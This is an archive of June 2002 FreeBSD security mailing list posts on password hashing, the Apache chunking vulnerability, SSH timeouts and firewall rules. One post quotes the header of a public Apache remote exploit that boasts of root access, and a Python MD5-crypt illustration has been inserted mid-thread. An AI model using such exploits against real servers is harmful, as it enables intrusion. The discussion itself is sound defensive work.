nbm@mithrandr.moria.org

From owner-freebsd-security Thu Jun 20 06:46:37 2002
Date: Thu, 20 Jun 2002 08:46:25 -0500
From: "Eric F Crist"
To: "'Dag-Erling Smorgrav'"
Cc: "'Ryan Thompson'", "'Bill Moran'"
Subject: RE: Password security
Message-ID: <001401c21860$e02392f0$77fe180c@armageddon>

So, have you changed the hash from DES to something different? If not, you're still dealing with an 8 character limit. Certainly the length at this point could be considered arbitrary, but only the first 8 characters count.
Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: des@flood.ping.uio.no [mailto:des@flood.ping.uio.no] On Behalf Of Dag-Erling Smorgrav
Sent: Thursday, June 20, 2002 3:45 AM
To: Eric F Crist
Cc: 'Ryan Thompson'; 'Bill Moran'; freebsd-security@FreeBSD.ORG
Subject: Re: Password security

"Eric F Crist" writes:
> What I failed to point out was that, if you're using FreeBSD, which I
> assume you as you're posting to this group, the FreeBSD login utility
> still only recognizes 8 character passwords, unless you've changed that.

Wrong. The 8-character limit was imposed by the traditional DES-based password hashing algorithm, not by login(1). By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 07:24:38 2002
Date: 20 Jun 2002 16:24:30 +0200
From: Dag-Erling Smorgrav
To: "Eric F Crist"
Cc: "'Ryan Thompson'", "'Bill Moran'"
Subject: Re: Password security
In-Reply-To: <001401c21860$e02392f0$77fe180c@armageddon>

"Eric F Crist" writes:
> So, have you changed the hash from DES to something different? If not,
> you're still dealing with an 8 character limit. Certainly the length at
> this point could be considered arbitrary, but only the first 8
> characters count.

To repeat what I wrote in my previous mail: "By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length."

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 07:47:57 2002
Date: Thu, 20 Jun 2002 10:43:40 -0400
From: Antoine Beaupre
To: Dag-Erling Smorgrav
Cc: "Eric F Crist", "'Ryan Thompson'", "'Bill Moran'"
Subject: hash-password length relation (was: Password security)
Message-Id: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>
Hi.

Spinning a bit off topic here, I was wondering...

Does the length of the encrypted password grow with the length of the password?

A.

On Thursday, 20 June 2002, at 10:24 AM, Dag-Erling Smorgrav wrote:
>
> To repeat what I wrote in my previous mail: "By default, FreeBSD uses
> an MD5-based hash, and supports passwords of arbitrary length."

From owner-freebsd-security Thu Jun 20 07:53:58 2002
Date: Thu, 20 Jun 2002 16:51:44 +0200
From: Poul-Henning Kamp
To: Antoine Beaupre
Cc: Dag-Erling Smorgrav, "Eric F Crist", "'Ryan Thompson'", "'Bill Moran'", freebsd-security@FreeBSD.ORG
Subject: Re: hash-password length relation (was: Password security)
Message-ID: <5258.1024584704@critter.freebsd.dk>
In-Reply-To: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>

In message <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>, Antoine Beaupre writes:
> Hi.
>
> Spinning a bit off topic here, I was wondering...
>
> Does the length of the encrypted password grow with the length of the
> password?

No.
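An added illustration of why the answer is "no" (this is not code from the thread): a pure-Python reimplementation of FreeBSD's $1$ MD5-crypt built on hashlib. Every byte of the password feeds the digest, yet the encoded output is always 22 characters after the salt, so the hash length is fixed; the salt "xxxxxx" and the test passwords match the perl crypt() session Matthew Seaman posts later in this thread, and the ninth-character comparison is a constructed case showing that, unlike DES crypt, characters past the eighth still matter.

```python
import hashlib

# Alphabet shared by the crypt(3)-style encoders (DES, MD5, Blowfish)
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value: int, count: int) -> bytes:
    """Encode `count` six-bit groups of value, least significant group first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: str, salt: str) -> str:
    """FreeBSD-style $1$ MD5-crypt of `password` with `salt`.

    `salt` may be passed bare ("xxxxxx") or with its "$1$" prefix, as perl's
    crypt() accepts it; at most 8 salt characters (up to a '$') are used.
    """
    pw = password.encode()
    if salt.startswith("$1$"):
        salt = salt[3:]
    sl = salt.split("$", 1)[0][:8].encode()

    # Outer digest: password, magic, salt ...
    ctx = hashlib.md5(pw + MAGIC + sl)
    # ... then len(password) bytes taken from MD5(password + salt + password),
    # so every byte of a long password influences the result.
    alt = hashlib.md5(pw + sl + pw).digest()
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    # For each bit of len(password): a NUL byte if set, else the first byte.
    bit = len(pw)
    while bit:
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()

    # 1000 stretching rounds, alternating the order of password and digest.
    for i in range(1000):
        ctx1 = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            ctx1.update(sl)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()

    # The 16-byte digest is re-ordered and packed into 22 output characters,
    # which is why the hash length never depends on the password length.
    encoded = bytearray()
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        encoded += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    encoded += _to64(final[11], 2)
    return (MAGIC + sl + b"$" + bytes(encoded)).decode()


if __name__ == "__main__":
    # Same inputs as the perl session quoted in this thread.
    for pw in ("a", "a" * 100):
        h = md5crypt(pw, "$1$xxxxxx")
        print(f"{len(pw):3d}-char password -> {len(h)}-char hash: {h}")
```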
--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe
Never attribute to malice what can adequately be explained by incompetence.

From owner-freebsd-security Thu Jun 20 08:01:35 2002
Date: 20 Jun 2002 17:00:23 +0200
From: Dag-Erling Smorgrav
To: Antoine Beaupre
Cc: "Eric F Crist", "'Ryan Thompson'", "'Bill Moran'"
Subject: Re: hash-password length relation (was: Password security)
In-Reply-To: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>

Antoine Beaupre writes:
> Does the length of the encrypted password grow with the length of the
> password?

Traditional DES always produces a 13-byte hash (including the salt). MD5 produces a 31-byte hash (also including the salt). Blowfish produces a 32-byte hash with (IIRC) a variable-length salt of up to 16 bytes.
Both MD5 and Blowfish use a special prefix to identify the hash algorithm used; it's usually three bytes long for MD5 and five or six bytes long for Blowfish.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 08:02:30 2002
Date: 20 Jun 2002 16:01:11 +0100
From: Matthew Seaman
To: Antoine Beaupre
Cc: Dag-Erling Smorgrav, Eric F Crist, "'Ryan Thompson'", "'Bill Moran'", freebsd-security@FreeBSD.ORG
Subject: Re: hash-password length relation (was: Password security)
Message-Id: <1024585271.61602.6.camel@claudette.e1.tornadogroup.com>
In-Reply-To: <1C4414A2-845C-11D6-887B-0050E4A0BB3F@anarcat.ath.cx>
On Thu, 2002-06-20 at 15:43, Antoine Beaupre wrote:
> Does the length of the encrypted password grow with the length of the
> password?

claudette:~:% perl -e 'print crypt("a", "\$1\$xxxxxx"), "\n";'
$1$xxxxxx$hklG2XADzlXp57Uqb/fBM0
claudette:~:% perl -e 'print crypt("a"x100, "\$1\$xxxxxx"), "\n";'
$1$xxxxxx$tRvOgaXGQf37NFBo31ZVv1

No.

Matthew
--
Matthew Seaman                                  01628 498661
Scrutantibus gehennas parabat                   St Augustine

From owner-freebsd-security Thu Jun 20 08:07:55 2002
Date: Thu, 20 Jun 2002 11:03:57 -0400
From: Antoine Beaupre
To: Dag-Erling Smorgrav
Cc: "Eric F Crist", "'Ryan Thompson'", "'Bill Moran'"
Subject: Re: hash-password length relation (was: Password security)

Thank you everyone for such quick response.

A.

On Thursday, 20 June 2002, at 11:00 AM, Dag-Erling Smorgrav wrote:
> Antoine Beaupre writes:
> > Does the length of the encrypted password grow with the length of the
> > password?
>
> Traditional DES always produces a 13-byte hash (including the salt).
> MD5 produces a 31-byte hash (also including the salt). Blowfish
> produces a 32-byte hash with (IIRC) a variable-length salt of up to 16
> bytes. Both MD5 and Blowfish use a special prefix to identify the
> hash algorithm used; it's usually three bytes long for MD5 and five or
> six bytes long for Blowfish.
>
> DES
> --
> Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 09:38:47 2002
Date: Thu, 20 Jun 2002 11:38:33 -0500
From: "Eric F Crist"
To: "'Dag-Erling Smorgrav'"
Cc: "'Ryan Thompson'", "'Bill Moran'"
Subject: RE: Password security
Message-ID: <001501c21878$ec7ecbb0$77fe180c@armageddon>

My bad, had a serious brain fart this morning.
;)

Eric F Crist
President/Sys Admin
AdTech Integrated Systems, Inc
http://www.adtechintegrated.com

-----Original Message-----
From: des@flood.ping.uio.no [mailto:des@flood.ping.uio.no] On Behalf Of Dag-Erling Smorgrav
Sent: Thursday, June 20, 2002 9:25 AM
To: Eric F Crist
Cc: 'Ryan Thompson'; 'Bill Moran'; freebsd-security@FreeBSD.ORG
Subject: Re: Password security

"Eric F Crist" writes:
> So, have you changed the hash from DES to something different? If not,
> you're still dealing with an 8 character limit. Certainly the length at
> this point could be considered arbitrary, but only the first 8
> characters count.

To repeat what I wrote in my previous mail: "By default, FreeBSD uses an MD5-based hash, and supports passwords of arbitrary length."

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Thu Jun 20 09:56:49 2002
Date: Thu, 20 Jun 2002 09:55:08 -0700 (PDT)
From: Dan Busarow
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
In-Reply-To: <4.3.2.7.2.20020619225221.023306b0@localhost>

On Jun 19, Brett Glass wrote:
> At 06:56 PM 6/19/2002, Mikel King wrote:
> > Two suggestions from my own experience with working with Apache...kick the default conf and directory tree to the curb.
>
> I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball, letting it use its default directory (/usr/local/apache2). It wouldn't run; it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types, even though that path was not in Apache's standard tree at all! Not sure what is going on here. Any ideas?

Brett,

I installed three copies of 2.0.39 yesterday. All worked fine. I did use the --prefix=/usr/local/apache2 arg to configure, maybe the default is broken?

Dan
--
Dan Busarow                                 949 443 4172
Dana Point Communications, Inc.             dan@dpcsys.com
Dana Point, California
83 09 EF 59 E0 11 89 B4 8D 09 DB FD E1 DD 0C 82

From owner-freebsd-security Thu Jun 20 12:38:55 2002
Date: Thu, 20 Jun 2002 15:45:58 -0400 (EDT)
From: Jeff Gentry
To: freebsd-security@freebsd.org
Subject: Apache root exploitable?
Message-ID: <20020620154453.L76822-100000@hellfire.hexdump.org>

I'm a bit confused following all these messages, especially with that exploit script someone sent out "Apache exploitable?".
Is this thing root exploitable? Reading the code sent out in the aforementioned thread it sounds as if it might be but I was not certain. Is there a workaround outside of closing off Apache?

Thanks
-J

From owner-freebsd-security Thu Jun 20 12:40:58 2002
Message-ID: <3D123DD0.1050005@ocsinternet.com>
Date: Thu, 20 Jun 2002 15:40:48 -0500
From: Mikel King
To: Brett Glass
Cc: Bill Moran, jdarnold@buddydog.org, freebsd-security@FreeBSD.ORG
Subject: Re: Apache 1.3.26 port
References: <200206191723590704.0033D6FF@mail.speakeasy.net> <3D110D17.50809@potentialtech.com> <4.3.2.7.2.20020619225221.023306b0@localhost>

Brett Glass wrote:
> At 06:56 PM 6/19/2002, Mikel King wrote:
>
>> Two suggestions from my own experience with working with Apache...kick the default conf and directory tree to the curb.
>
> I just tried to build 2.0.39 on a 4.5-p4 system from the Apache tarball, letting it use its default directory (/usr/local/apache2).
> It wouldn't run; it kept complaining that it couldn't find /usr/local/etc/apache2/mime.types, even though that path was not in Apache's standard tree at all! Not sure what is going on here. Any ideas?
>
> --Brett

One guess is you might try building apache2 from the ports, immediately followed by the tarball you downloaded. I know that doesn't solve the problem, but it may side step it for the time being... When I get a few spare minutes, I shall attempt to build it and see what's happening.

--
Cheers,
Mikel
+------------------------------------------+
Ok I'll go fsck my brain for a while as it's been a rather long night.
+------------------------------------------+

From owner-freebsd-security Thu Jun 20 12:42:16 2002
Date: Thu, 20 Jun 2002 13:41:43 -0600
From: "David G . Andersen"
To: Jeff Gentry
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
Message-ID: <20020620134143.C14099@cs.utah.edu>
References: <20020620154453.L76822-100000@hellfire.hexdump.org>
In-Reply-To: <20020620154453.L76822-100000@hellfire.hexdump.org>; from freebsd@hexdump.org on Thu, Jun 20, 2002 at 03:45:58PM -0400

Jeff Gentry just mooed:
> I'm a bit confused following all these messages, especially with that
> exploit script someone sent out "Apache exploitable?". Is this thing root
> exploitable? Reading the code sent out in the aforementioned thread it
> sounds as if it might be but I was not certain.

It's not _root_ exploitable unless you run Apache as root. If you do that, you're asking for it anyway.

It may or may not be remotely exploitable. It looks a lot more exploitable than it did a few days ago. :)

Regardless, you should:

> Is there a workaround outside of closing off Apache?

Upgrade to 1.3.26 or 2.0.39.
-Dave
--
work: dga@lcs.mit.edu me: dga@pobox.com
MIT Laboratory for Computer Science http://www.angio.net/

From owner-freebsd-security Thu Jun 20 13:15:18 2002
Date: Thu, 20 Jun 2002 15:15:09 -0500
From: "Jacques A. Vidrine"
To: "David G . Andersen"
Cc: Jeff Gentry, freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
Message-ID: <20020620201509.GC56227@madman.nectar.cc>
References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu>
In-Reply-To: <20020620134143.C14099@cs.utah.edu>

On Thu, Jun 20, 2002 at 01:41:43PM -0600, David G . Andersen wrote:
>
> It's not _root_ exploitable unless you run Apache as root.
> If you do that, you're asking for it anyway.
>
> It may or may not be remotely exploitable.
> It looks a lot more
> exploitable than it did a few days ago. :)

David is on the money. We've yet to confirm that the bug can be exploited for arbitrary code execution, but GOBBLES's post (and se@FreeBSD.org's follow-up) do have us worried still.

Assume that it can be exploited, and upgrade as soon as you can.

After all, even if it is `only' a DoS, it will probably get hit a lot once someone writes a Code Red-like worm for the Win32 version. History tells us that such worms don't bother to check the operating system or version that is running before attacking, and I would expect apache < 1.3.26 servers to experience a lot of downtime as a result. :-)

Cheers,
--
Jacques A. Vidrine http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Thu Jun 20 13:18:40 2002
Date: Thu, 20 Jun 2002 16:25:29 -0400 (EDT)
From: Jeff Gentry
To: "David G . Andersen"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
In-Reply-To: <20020620134143.C14099@cs.utah.edu>
Message-ID: <20020620162448.V77014-100000@hellfire.hexdump.org>

> It's not _root_ exploitable unless you run Apache as root.
> If you do that, you're asking for it anyway.

Nope :) While I mind DoS exploits, having ppl finding their way into my system is even more bothersome, especially if there is no workaround available, but ...

> Upgrade to 1.3.26 or 2.0.39.

Gotcha. Thanks.

-J

From owner-freebsd-security Thu Jun 20 13:28:27 2002
Date: Thu, 20 Jun 2002 13:28:18 -0700 (PDT)
From: Marc Slemko
To: "Jacques A. Vidrine"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
In-Reply-To: <20020620201509.GC56227@madman.nectar.cc>

On Thu, 20 Jun 2002, Jacques A. Vidrine wrote:
> On Thu, Jun 20, 2002 at 01:41:43PM -0600, David G . Andersen wrote:
> >
> > It's not _root_ exploitable unless you run Apache as root.
> > If you do that, you're asking for it anyway.
> >
> > It may or may not be remotely exploitable.
> > It looks a lot more
> > exploitable than it did a few days ago. :)
>
> David is on the money. We've yet to confirm that the bug can be
> exploited for arbitrary code execution, but GOBBLES's post (and
> se@FreeBSD.org's follow-up) do have us worried still.

Yes, I have every reason to think it is exploitable for remote code execution.

> After all, even if it is `only' a DoS, it will probably get hit a
> lot once someone writes a Code Red-like worm for the Win32 version.
> History tells us that such worms don't bother to check the operating
> system or version that is running before attacking, and I would expect
> apache < 1.3.26 servers to experience a lot of downtime as a result.
> :-)

It isn't a very serious DoS though.

From owner-freebsd-security Thu Jun 20 13:32:20 2002
Date: Thu, 20 Jun 2002 15:32:12 -0500
From: "Jacques A. Vidrine"
To: Marc Slemko
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
Message-ID: <20020620203212.GA56421@madman.nectar.cc>
Mail-Followup-To: "Jacques A.
Vidrine", Marc Slemko, freebsd-security@FreeBSD.ORG
References: <20020620201509.GC56227@madman.nectar.cc>

On Thu, Jun 20, 2002 at 01:28:18PM -0700, Marc Slemko wrote:
> > After all, even if it is `only' a DoS, it will probably get hit a
> > lot once someone writes a Code Red-like worm for the Win32 version.
> > History tells us that such worms don't bother to check the operating
> > system or version that is running before attacking, and I would expect
> > apache < 1.3.26 servers to experience a lot of downtime as a result.
> > :-)
>
> It isn't a very serious DoS though.

Code Red and friends didn't even tickle a bug (in non-Microsoft servers), yet choked many non-Microsoft servers down due to the sheer number of requests. A `Code Red for Win32 Apache Chunking' would probably not spread as much (unless there is way more Win32 Apache than I think), but the number of requests generated could still be large --- and have special impact on Apache < 1.3.26 servers.

Cheers,
--
Jacques A. Vidrine http://www.nectar.cc/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org .
nectar@kth.se

From owner-freebsd-security Thu Jun 20 13:53:34 2002
Date: Thu, 20 Jun 2002 13:53:28 -0700 (PDT)
From: Marc Slemko
To: "Jacques A. Vidrine"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
In-Reply-To: <20020620203212.GA56421@madman.nectar.cc>

On Thu, 20 Jun 2002, Jacques A. Vidrine wrote:
> On Thu, Jun 20, 2002 at 01:28:18PM -0700, Marc Slemko wrote:
> > > After all, even if it is `only' a DoS, it will probably get hit a
> > > lot once someone writes a Code Red-like worm for the Win32 version.
> > > History tells us that such worms don't bother to check the operating
> > > system or version that is running before attacking, and I would expect
> > > apache < 1.3.26 servers to experience a lot of downtime as a result.
> > > :-)
> >
> > It isn't a very serious DoS though.
>
> Code Red and friends didn't even tickle a bug (in non-Microsoft
> servers), yet choked many non-Microsoft down due to the sheer number
> of requests.

The vast majority of servers were not seriously impacted.
Ones with large numbers of IP-based virtual hosts were hit harder, but the typical server really wasn't impacted other than all the admins sending all sorts of mail to mailing lists saying "help me help me I'm under attack".

> A `Code Red for Win32 Apache Chunking' would probably
> not spread as much (unless there is way more Win32 Apache than I
> think), but the number of requests generated could still be large ---
> and have special impact on Apache < 1.3.26 servers.

The bug can be exploited on various Unix platforms as well.

From owner-freebsd-security Thu Jun 20 14:01:10 2002
Date: Thu, 20 Jun 2002 21:59:22 +0100
From: Jez Hancock
To: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
Message-ID: <20020620215922.A32355@munkboxen.mine.nu>
References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu> <20020620201509.GC56227@madman.nectar.cc>
In-Reply-To: <20020620201509.GC56227@madman.nectar.cc>; from nectar@FreeBSD.ORG on Thu, Jun 20, 2002 at 03:15:09PM -0500

On Thu, Jun 20, 2002 at 03:15:09PM -0500, Jacques A. Vidrine wrote:
> David is on the money.
> We've yet to confirm that the bug can be
> exploited for arbitrary code execution, but GOBBLES's post (and
> se@FreeBSD.org's follow-up) do have us worried still.

In my experience, it has been confirmed/checked to work on OpenBSD 3.0. An associate tested the exploit code submitted by GOBBLES and as it says on the tin, it does lead to a buffer overflow in OpenBSD (certainly 3.0).

The exploit header bullsh^H^H^H^H^Hlurb below however is some cause for concern, stating that the exploit is indeed applicable to FreeBSD 4.3-4.5. In my experience this is not the case running FreeBSD 4.4 Apache 1.3.20, but perhaps the author of the vulnerability would like to comment on this. I am a mere mortal and do not claim to have ever understood the finer details of bof and such. :)

 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * The "experts" have already concurred that this bug...
 *      - Can not be exploited on 32-bit *nix variants
 *      - Is only exploitable on win32 platforms
 *      - Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 * <
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great.
 *
 * [#!GOBBLES QUOTES]

In any event, what Jacques most eminently points out:

> Assume that it can be exploited, and upgrade as soon as you can.
>
> After all, even if it is `only' a DoS, it will probably get hit a
> lot once someone writes a Code Red-like worm for the Win32 version.
> History tells us that such worms don't bother to check the operating
> system or version that is running before attacking, and I would expect
> apache < 1.3.26 servers to experience a lot of downtime as a result.
> :-)

Best Regards,

Jez
--
Windows: "Where do you want to go today?"
Linux: "Where do you want to go tomorrow?"
FreeBSD: "Are you guys coming, or what?"

From owner-freebsd-security Thu Jun 20 14:45:16 2002
Message-ID: <20020620214512.42806.qmail@web10101.mail.yahoo.com>
Date: Thu, 20 Jun 2002 14:45:12 -0700 (PDT)
From: twig les
Subject: SSH timeout settings
To: freebsd-security@FreeBSD.ORG

Hey all, I think this is an easy one masquerading as a tough one.... My OpenSSH on my Free 4.4 Release box just lets me keep an open session indefinitely without any activity. I've read man sshd and all sorts of other things but no mention.

So the short version is: where do I lower the timeout of SSH?

Thanks for anything...

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

__________________________________________________
Do You Yahoo!?
Yahoo!
- Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com

From owner-freebsd-security Thu Jun 20 14:48:33 2002
Date: Thu, 20 Jun 2002 15:48:23 -0600
From: "David G . Andersen"
To: Jez Hancock
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Apache root exploitable?
Message-ID: <20020620154823.E14099@cs.utah.edu>
References: <20020620154453.L76822-100000@hellfire.hexdump.org> <20020620134143.C14099@cs.utah.edu> <20020620201509.GC56227@madman.nectar.cc> <20020620215922.A32355@munkboxen.mine.nu>
In-Reply-To: <20020620215922.A32355@munkboxen.mine.nu>; from jez.hancock@munkboxen.mine.nu on Thu, Jun 20, 2002 at 09:59:22PM +0100

Jez Hancock just mooed:
> On Thu, Jun 20, 2002 at 03:15:09PM -0500, Jacques A. Vidrine wrote:
> > David is on the money. We've yet to confirm that the bug can be
> > exploited for arbitrary code execution, but GOBBLES's post (and
> > se@FreeBSD.org's follow-up) do have us worried still.
> In my experience, it has been confirmed/checked to work on OpenBSD 3.0.
>
> An associate tested the exploit code submitted by GOBBLES and as it says
> on the tin, it does lead to a buffer overflow in OpenBSD (certainly
> 3.0).

That's enough confirmation for me, IMHO. :-)

> The exploit header bullsh^H^H^H^H^Hlurb below however is some cause for
> concern, stating that the exploit is indeed applicable to FreeBSD
> 4.3-4.5. In my experience this is not the case running FreeBSD 4.4
> Apache 1.3.20, but perhaps the author of the vulnerability would like to
> comment on this. I am a mere mortal and do not claim to have ever
> understood the finer details of bof and such. :)

You're misunderstanding the text in their message. They claim that the bug is exploit_able_ on OpenBSD, FreeBSD, Solaris, and Linux -- but they say that the exploit they've published is only for OpenBSD.

-Dave
--
work: dga@lcs.mit.edu me: dga@pobox.com
MIT Laboratory for Computer Science http://www.angio.net/

From owner-freebsd-security Thu Jun 20 15:23:32 2002
Date: Fri, 21 Jun 2002 00:22:54 +0200
From: jeremie le-hen
To: twig les
Cc: freebsd-security@freebsd.org
Subject: Re: SSH timeout settings
Message-ID: <20020621002254.B21286@rocco.epita.fr>
References: <20020620214512.42806.qmail@web10101.mail.yahoo.com>
In-Reply-To: <20020620214512.42806.qmail@web10101.mail.yahoo.com>; from twigles@yahoo.com on Thu, Jun 20, 2002 at 02:45:12PM -0700
> Hey all, I think this is an easy one masquerading as a
> tough one.... My OpenSSH on my Free 4.4 Release box
> just lets me keep an open session indefinitely without
> any activity. I've read man sshd and all sorts of
> other things but no mention.
>
> So the short version is: where do I lower the timeout
> of SSH?

These two options from the sshd(8) manual page may help you (grabbed from my 4.6-RELEASE box -- "sshd version OpenSSH_2.9 FreeBSD localisations 20020307"):

     ClientAliveInterval
             Sets a timeout interval in seconds after which if no data has
             been received from the client, sshd will send a message through
             the encrypted channel to request a response from the client. The
             default is 0, indicating that these messages will not be sent to
             the client. This option applies to protocol version 2 only.

     KeepAlive
             Specifies whether the system should send keepalive messages to
             the other side. If they are sent, death of the connection or
             crash of one of the machines will be properly noticed. However,
             this means that connections will die if the route is down
             temporarily, and some people find it annoying. On the other hand,
             if keepalives are not sent, sessions may hang indefinitely on the
             server, leaving ``ghost'' users and consuming server resources.

             The default is ``yes'' (to send keepalives), and the server will
             notice if the network goes down or the client host reboots. This
             avoids infinitely hanging sessions.

             To disable keepalives, the value should be set to ``no'' in both
             the server and the client configuration files.
--
Jeremie aka TataZ
le-hen_j@epita.fr

From owner-freebsd-security Thu Jun 20 15:46:39 2002
Message-ID: <20020620224632.62118.qmail@web10102.mail.yahoo.com>
Date: Thu, 20 Jun 2002 15:46:32 -0700 (PDT)
From: twig les
Subject: Re: SSH timeout settings
To: jeremie le-hen
Cc: freebsd-security@freebsd.org
In-Reply-To: <20020621002254.B21286@rocco.epita.fr>

Well I don't have the ClientAliveInterval option in my version of SSH (the one default installed in 4.4 release, not sure how to upgrade since pkg_info doesn't mention SSH) and the KeepAlive option isn't exactly what I'm looking for. BTW, under the ClientAliveInterval I noticed that it doesn't say that the server will kill the session if the client doesn't respond with activity (not just a connectivity test, I'm looking for activity).

--- jeremie le-hen wrote:
> > Hey all, I think this is an easy one masquerading as a
> > tough one.... My OpenSSH on my Free 4.4 Release box
> > just lets me keep an open session indefinitely without
> > any activity. I've read man sshd and all sorts of
> > other things but no mention.
> >
> > So the short version is: where do I lower the timeout
> > of SSH?
>
> These two options from the sshd(8) manual page may help you (grabbed from my
> 4.6-RELEASE box -- "sshd version OpenSSH_2.9 FreeBSD localisations 20020307"):
>
>      ClientAliveInterval
>              Sets a timeout interval in seconds after which if no data has
>              been received from the client, sshd will send a message through
>              the encrypted channel to request a response from the client. The
>              default is 0, indicating that these messages will not be sent to
>              the client. This option applies to protocol version 2 only.
>
>      KeepAlive
>              Specifies whether the system should send keepalive messages to
>              the other side. If they are sent, death of the connection or
>              crash of one of the machines will be properly noticed. However,
>              this means that connections will die if the route is down
>              temporarily, and some people find it annoying. On the other hand,
>              if keepalives are not sent, sessions may hang indefinitely on the
>              server, leaving ``ghost'' users and consuming server resources.
>
>              The default is ``yes'' (to send keepalives), and the server will
>              notice if the network goes down or the client host reboots. This
>              avoids infinitely hanging sessions.
>
>              To disable keepalives, the value should be set to ``no'' in both
>              the server and the client configuration files.
>
> --
> Jeremie aka TataZ
> le-hen_j@epita.fr

=====
-----------------------------------------------------------
Only fools have all the answers.
-----------------------------------------------------------

__________________________________________________
Do You Yahoo!?
Yahoo!
- Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com

From owner-freebsd-security Thu Jun 20 16:11:23 2002
Date: Thu, 20 Jun 2002 17:11:11 -0600
From: "Dalin S. Owen"
To: freebsd-security@freebsd.org
Subject: IPFW/IPF Setup/Established
Message-ID: <20020620171111.A24480@nexusxi.com>

First an example: :)

    ipfw add 9 allow tcp from any to any established
    ipfw add 10 allow tcp from any to 10.0.0.2 80 setup
    (DEFAULT DENY RULE)

vs.

    block in all
    block out all
    pass in quick on fxp0 proto tcp from any to 10.0.0.2 port = 80 flags S keep state

These two rule snippets do essentially the same thing, I know one of them is stateful, and the other is not. It is kind of like comparing apples to oranges... but they behave the same in the end. They both check for a SYN, and keep a (virtual) state.

I have heard from the IPF community that an "allow tcp from any to any established" can be spoofed. Don't they need the right sequence number to do that? I mean, to send packets to my machine "claiming" to already be established to a private port?
If so, then why is the /etc/rc.firewall script written this way? There must be a reason.

Also, which one is faster at matching packets on average?

Help me end the ipfw + ipf madness!!?!? :)

Insanely yours,
Dalin S. Owen

From owner-freebsd-security Thu Jun 20 16:17:11 2002
Message-ID: <3D126270.5050604@earthlink.net>
Date: Thu, 20 Jun 2002 16:17:04 -0700
From: Lawrence Sica
To: Klaus Steden
Cc: Maxlor, "freebsd-security@FreeBSD.ORG"
Subject: Re: preventing tampering with tripwire
References: <27700541.1024450071@[10.0.0.16]> <2799555.1024487443@[10.0.0.16]> <20020620011704.G589@cthulu.compt.com>

Klaus Steden wrote:
>> Putting the tripwire binary on an external, read only drive
>> doesn't help.
>> As I mentioned, an attacker who gained root could simply unmount the disk
>> and place a tampered copy into the mountpoint dir. I would only notice this
>> if I happened to have a closer look at df *and* the attacker was nice
>> enough not to modify df too.
>>

http://www.phrack.org/show.php?p=51&a=9

The above URL is a decent article about ways to bypass systems. Sure it's
from 1997, but it still has good insights and information.

--Larry

From owner-freebsd-security Thu Jun 20 16:47:14 2002
Date: Thu, 20 Jun 2002 16:46:56 -0700
From: William Carrel
To: "Dalin S. Owen"
Subject: Re: IPFW/IPF Setup/Established
In-Reply-To: <20020620171111.A24480@nexusxi.com>

On 6/20/02 4:11 PM, "Dalin S. Owen" wrote:

> ipfw add 9 allow tcp from any to any established
